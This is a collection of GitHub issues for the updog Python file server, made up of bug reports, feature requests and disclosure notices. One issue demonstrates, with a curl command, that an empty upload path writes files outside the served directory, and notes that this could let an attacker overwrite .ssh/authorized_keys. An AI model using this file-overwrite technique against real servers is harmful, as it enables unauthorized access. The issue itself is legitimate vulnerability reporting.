sc0tfree / updog Goto Github PK

Hello 👋

I just wanted to let you know that we received multiple vulnerability disclosures against your repository through our disclosure program. I tried looking for a contactable e-mail on your repository and for a security process, but could not find either - hence the issue.

You can view the details for each:

https://huntr.dev/bounties/1-sc0tfree/updog/
https://huntr.dev/bounties/2-sc0tfree/updog/
https://huntr.dev/bounties/3-sc0tfree/updog/
https://huntr.dev/bounties/4-sc0tfree/updog/
https://huntr.dev/bounties/5-sc0tfree/updog/

The reports are private to you and the reporter. If you would prefer not to sign-up, let me know a preferred method to deliver the contents of the disclosures, and I will be happy to send them over to you.

-- Jamie from huntr.dev

Hi there,

I couldn't find a SECURITY.md in your repository and so am not sure how to best contact you privately to disclose the security issue.

Can you add a SECURITY.md file with your e-mail to your repository, so that I know who to contact? GitHub suggests that a security policy is the best way to make sure security issues are responsibly disclosed.

Once you've done that, please let me know so I can ping you the info.

Thanks! (cc @JamieSlome)

Updog listing explodes if its asked to list a directory containing a dead symlink.

To reproduce:

1. Create a directory with a dead symbolic link (ln -s super-dead dead-link)
2. View directory in Updog.

Error: Internal Server Error when browsing to http://127.0.0.1:9090/ . Changed port, same. python ./setup install completed without issues.
Server itself outputs: "127.0.0.1 - - [03/Dec/2020 09:43:48] "GET / HTTP/1.1" 500 -"

Less an issue more a feature request: I would love to see WebDAV be added to updog so versatility goes up the wall!

I love the tool!

Please note these two screenshots, I run updog in my win10 pc, and try to upload a file named "测试.txt", when I finished uploading, the file which is uploaded to the updog file directory is named "txt", I think its a bug.

First of all thanks for the great tool being a really nice replacement for http.server on steroids 👍

One thing I'd love to have is the support for CORS headers / enabling CORS for the server.

Background:
In some places I'd like to maybe serve a small script or similar to a web page (e.g. to inject some arbitrary code). However, browsers will block loading the resource if the server does not send appropriate CORS headers.

Potential solution:
Since updog uses Flask it might be as easy as to bring in https://github.com/corydolphin/flask-cors and add an additional command line argument, e.g. --cors to enable this behavior (as an opt-in).

If you in general agree on this being a good idea I could come up with a PR.

Downside:
It would increase the list of dependencies of updog to include flask-cors and make the installation bigger.

The Updog listing 403's if given a directory with a symbolic link to an inaccessible file.

To reproduce:

1. Create a directory with a dead symbolic link on account of the destination being unreachable. I discovered this browsing my /etc directory, which had a symlink to something walled off to my user in /boot.
2. View directory in Updog.

Expected behavior is that only the affected path should be be affected, not the parent directory with the link.

Starting the server with "updog" allows stopping the server with CTRL+C. However, after navigation and subsequent console output, the terminal hangs when attempting to capture CTRL+C event. The delay seems to be coupled with some internal I/O block and does not properly listen for the stop signal.

I get a NET::ERR_CERT_AUTHORITY_INVALID on Chrome.

Command used: updog -d . -p 8000 --ssl

Do I need to generate the SSL certificate and set it somewhere manually? If so, can you give me the steps on how to do that so it'll work with updog? Or is it the same as how you would do it with SimpleHTTPServer? (I've never used SSL on SimpleHTTPServer)

I can get the files just fine using wget http://myip:port/filename. But, accessing remote files on my local pc doesn't really seem to be working for me. Can you please let me know how to best access the remote files?

Is there a way to upload/download files directly from the command line?

I tried before there can't upload over 1Mb files size

Hello!
This is a great tool. But if there was a feature to change the directory from the web front end that would be great i guess.

title

In a fresh Ubuntu env i installed pip3, then pip3 install updog (which succeeded without errors) and then when i try and run "updog" i get command not found :(

Would it be possible to add functionality to download directories as zip archives. As of now we have to zip the directory on the host and then run updog one level higher. It would be nice to run updog in a directory and be able to download all the contents of the given directory.

hope add drag upload function.

Here is an awesome feature request that would add massive pentest value.

I would like to be able to to use use curl and wget to upload files from linux boxes to my updog web server. This is great for when you have shell but no browser access and want an easy way to transfer files. Curl and Wget both these methods just need updog to support receiving them.

Hi,
every time i'm trying to upload:

curl -F '[email protected];filename=header.cap' http://127.0.0.1:9090/ -v
                                
*   Trying 127.0.0.1:9090...
* Connected to 127.0.0.1 (127.0.0.1) port 9090 (#0)
> POST / HTTP/1.1
> Host: 127.0.0.1:9090
> User-Agent: curl/7.74.0
> Accept: */*
> Content-Length: 804
> Content-Type: multipart/form-data; boundary=------------------------3c87d2a52649c76a
> 
* We are completely uploaded and fine
* Mark bundle as not supporting multiuse
* HTTP 1.0, assume close after body
< HTTP/1.0 405 METHOD NOT ALLOWED
< Content-Type: text/html; charset=utf-8
< Allow: GET, HEAD, OPTIONS
< Content-Length: 178
< Server: Werkzeug/1.0.1 Python/3.9.2
< Date: Sat, 20 Mar 2021 14:29:35 GMT
< 
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>405 Method Not Allowed</title>
<h1>Method Not Allowed</h1>
<p>The method is not allowed for the requested URL.</p>
* Closing connection 0

and from server side i get:

updog -p 9090

[+] Serving /home...
 * Running on http://0.0.0.0:9090/ (Press CTRL+C to quit)
127.0.0.1 - - [20/Mar/2021 10:29:35] "POST / HTTP/1.1" 405 -

What im doing wrong?

Assume you are in the directory ~/cwd and you do updog -d $(readlink -f ~/www). A POST to /upload with an empty path parameter will upload the file to ~/cwd instead of ~/www

~% mkdir ~/www ~/cwd

~% cd ~/cwd

~/cwd% ~/.local/bin/updog -d $(readlink -f ~/www) &
[1] 4124
~/cwd]% [+] Serving /home/justin/www...
 * Running on http://0.0.0.0:9090/ (Press CTRL+C to quit)

~/cwd% ls issue
ls: cannot access 'issue': No such file or directory

~/cwd% curl -v http://127.0.0.1:9090/upload -F 'file=@/etc/issue' -F 'path='
* Expire in 0 ms for 6 (transfer 0x5585447baf90)
*   Trying 127.0.0.1...
* TCP_NODELAY set
* Expire in 200 ms for 4 (transfer 0x5585447baf90)
* Connected to 127.0.0.1 (127.0.0.1) port 9090 (#0)
> POST /upload HTTP/1.1
> Host: 127.0.0.1:9090
> User-Agent: curl/7.64.0
> Accept: */*
> Content-Length: 317
> Content-Type: multipart/form-data; boundary=------------------------286bd5dc6119e79d
>
127.0.0.1 - - [19/Feb/2020 12:22:22] "POST /upload HTTP/1.1" 302 -
* HTTP 1.0, assume close after body
< HTTP/1.0 302 FOUND
< Content-Type: text/html; charset=utf-8
< Content-Length: 207
< Location: http://127.0.0.1:9090/None
< Server: Werkzeug/1.0.0 Python/3.7.6
< Date: Wed, 19 Feb 2020 01:22:22 GMT
<
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>Redirecting...</title>
<h1>Redirecting...</h1>
* Closing connection 0
<p>You should be redirected automatically to target URL: <a href=""></a>.  If not click the link.

~/cwd% ls issue
issue

~/cwd% cat issue
Debian GNU/Linux 10 \n \l

If the user is in ~ or another interesting directory at the time of doing updog -d /some/other/directory then a remote attacker can overwrite interesting files such as .ssh/authorized_keys

As above.

As stated, when I try to run updog from root or if I do updog -d / or updog -d \/, all links in http interface seems to miss their first letter, like /etc becomes 0.0.0.0:9090/tc and so on

To reproduce:

• updog -d /
• open web interface
• see what is a http link to /etc - it would be /tc

I would appreciate a upload-only mode. Just like https://github.com/stackp/Droopy. But don't make it the default (like Droopy does). I guess default should be #3.

So two new flags:

--allow-upload
--upload-only

Thanks for the great tool, btw. ;)

I wrote one already, it works for me, maybe it will help others 😙

FROM python:3.8-alpine

WORKDIR /uploads
VOLUME /uploads

RUN apk add gcc musl-dev libffi-dev openssl-dev

RUN pip install updog

EXPOSE 9090

CMD ["updog"]

I think it should be better if instead of pip installing it installed the requirements.txt, but I wrote it this way and it works 😅

Updog is functional on 3.11 but when trying to run on 3.10.x, I receive the following error

> updog
Traceback (most recent call last):
  File "C:\Users\consultant\.pyenv\pyenv-win\versions\3.10.5\lib\runpy.py", line 196, in _run_module_as_main
    return _run_code(code, main_globals, None,
  File "C:\Users\consultant\.pyenv\pyenv-win\versions\3.10.5\lib\runpy.py", line 86, in _run_code
    exec(code, run_globals)
  File "C:\Users\consultant\.pyenv\pyenv-win\versions\3.10.5\Scripts\updog.exe\__main__.py", line 4, in <module>
  File "C:\Users\consultant\.pyenv\pyenv-win\versions\3.10.5\lib\site-packages\updog\__main__.py", line 5, in <module>
    from flask import Flask, render_template, send_file, redirect, request, send_from_directory, url_for, abort
  File "C:\Users\consultant\.pyenv\pyenv-win\versions\3.10.5\lib\site-packages\flask\__init__.py", line 19, in <module>
    from jinja2 import Markup, escape
ImportError: cannot import name 'Markup' from 'jinja2' (C:\Users\consultant\AppData\Roaming\Python\Python310\site-packages\jinja2\__init__.py)

I'm clueless why I can not access server????

And when try yo connect server ---- connection timed out Error

Hi,
Just seen this as a tool and would love to use it. However, when I start it, the default is my host IP. When I use HTB and THM, there is obviously a VPN link and a new address. From the help I could not see a way of engaging options to have that IP used instead.
Any pointers appreciated.
K

Steps to reproduce:

1. Run Updog on a directory.
2. While Updog is running, remove/rename the directory.
3. Visit Updog in a browser. The browser will be told it isn't redirecting properly.

I suggest to add a command-line option to allow setting a custom SSL-certificate.
ssl_context can be set with a touple of (certificate.pem, key.pem).
When using Let's Encrypt you are provided with fullchain.pem and privkey.pem.
I suggest a command-line option like this:
updog --ssl-cert fullchain.pem --ssl-key privkey.pem

Hi there,

This may be an issue with me rather than updog so maybe some guidance would be great. When I upgrade Kali all of a sudden when I try to run updog I get this issue pictured. It also happens with other python tools like Autorecon so it is not entirely an Updog problem. Have you any guidance on how best to install it to avoid this issue? Maybe clone the repository and just call a python file directly every time rather than expect it to run by just typing updog or something although to be honest I like that simplicity.....

Thanks

when ever i start updog the interface is eth0 where i need tun0 how can i change it?

Win10 python 3.7 X64
Both these could not get in D:\Test

updog -d D:\\  -p 1920
updog -d D:\  -p 1921

In chrome if get http://127.0.0.1:1920/Test will hit http://127.0.0.1:1920/est

But this work

cd /d D:\
updog -p 1922

Hi! As name suggests, I think it would be nice to have a --read-only/--no-upload/... switch that disables the upload functionality. What do you think?

what's updog?

Open text files such as txt directly in the browser. For scenarios where you only need to view the contents of the file, you can avoid downloading the file

My VPS is dual stack with both ipv4&ipv6, while i successfully deployed updog,it turns out that updog is accessible only with IPv4,any attemption of acessing with IPv6 will end up with the alert says:ERR_CONNECTION_REFUSED.
And I checked netstat -tunlp,which confirms the problem,the process is only listening on 0.0.0.0,not on :: so it won't on ipv6.
Hopefully you can work this out,thanks.

doing updog -d with a relative path causes breakage in is_valid_subpath() and hence nothing really works.

e.g.

Does not works:

% mkdir www

% echo "hello world" > www/hello.txt

% updog -d www &
[1] 4001            
% [+] Serving www...
 * Running on http://0.0.0.0:9090/ (Press CTRL+C to quit)

% curl 127.0.0.1:9090/hello.txt
127.0.0.1 - - [19/Feb/2020 12:10:34] "GET /hello.txt HTTP/1.1" 200 -

<!DOCTYPE html>
<html lang="en">
<head>
    <!-- Meta tags -->
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <!-- Title -->
    <title>updog - www</title>

[... SNIP - home page is returned ...]

Works:

% kill %1
[1]  + terminated  ~/.local/bin/updog -d www

% ~/.local/bin/updog -d $(readlink -f www) &
[1] 4019
% [+] Serving /home/justin/www...
 * Running on http://0.0.0.0:9090/ (Press CTRL+C to quit)

% curl 127.0.0.1:9090/hello.txt
127.0.0.1 - - [19/Feb/2020 12:12:06] "GET /hello.txt HTTP/1.1" 200 -

hello world

If I were to use this as an upload/download file server, I don't necessarily want everyone I share the link with to be able to see all files.
A simple --no-listing would be great :)

How can I specify a different interface on a system with multiple network interfaces?

I think it would be useful to disable leaking the full directory path in the upper label.
if the server's owner decides to point updog to a certain folder, that should be the root of the webserver, full stop.

e.g. in the main example:

Directory: /home/sc0tfree

vs. something like:

Directory: /

I will never want to disclose the real path of the folder in which updog operates, but if somebody else believes otherwise, then this could be an option, rather than a hardcoded change.

EDIT: also, this "chrooted" behavior is more in line with python's http.server than displaying the full directory listing.

Dear Sc0tfree,

updog project is really great and can replace python's http simple server.
What it missed is the support of video streaming when I click view in browser.
May I ask if it is related to the conditional option of flask's send_file functions used in updog?

https://flask.palletsprojects.com/en/1.1.x/api/#flask.send_file

If the video seek function is included,sc0tfree will be more prefect.
Thanks again.

Nice project, I'm just not sure the current description is really the best for it.
Because that's true I sometimes use "python3 -m http.server" to download files from another PC but more than half of my recent usages are for quickly serving my hugo powered blog static files.

I tried with updog to serve a folder including an index.html file but by default it's always showing listing view, and if "View in Browser" button is rendering correctly the HTML, click a link is showing again the default view. That's not really what I'm expecting from a SimpleHTTPServer replacement.

Also another quick feedback: have to provide -d for overriding default folder is annoying, better promote it as an optional positional argument.

is it possible to make sharex config for it?

Hi,

First of all I love this tool and I use it daily. There is probably a simple "fix" for this question but I thought you could help me out.
I notice that when a file is grabbed succesfully with a 200 response the font is white and when it fails with a 302 response it is green.

I find this confusing so I want green for the succesful 200 responses and red for the 302 responses indicating they require attention.

How is this achieved please?

Thanks again